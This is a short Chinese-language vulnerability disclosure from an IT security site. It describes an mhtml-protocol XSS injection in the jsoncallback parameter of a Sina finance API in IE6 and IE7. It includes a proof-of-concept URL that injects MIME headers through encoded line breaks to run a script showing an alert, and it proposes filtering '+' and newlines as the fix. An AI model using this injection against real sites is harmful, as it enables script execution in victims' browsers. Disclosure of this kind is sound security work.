频道栏目
首页 > 资讯 > 网站安全 > 正文

mhtml协议XSS注入及修复方案

11-09-04        来源:[db:作者]  
收藏   我要投稿

jsoncallback过滤UTF-7 BOM。但是依然存在mhtml协议XSS注入。
详细说明:

IE6




IE7


漏洞证明:
mhtml:http://survey.finance.sina.com.cn/api/fusioncharts/get_from_data.php?sid=48302&aid=18099&jsoncallback=ax%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253A80sec%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4%252b%253D--!80sec
修复方案:
json问题。过滤+、回车换行。

相关TAG标签
上一篇:小议搜索匹配栏的注射
下一篇:计算机等级考试一级理论知识选择题题库(451-500)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站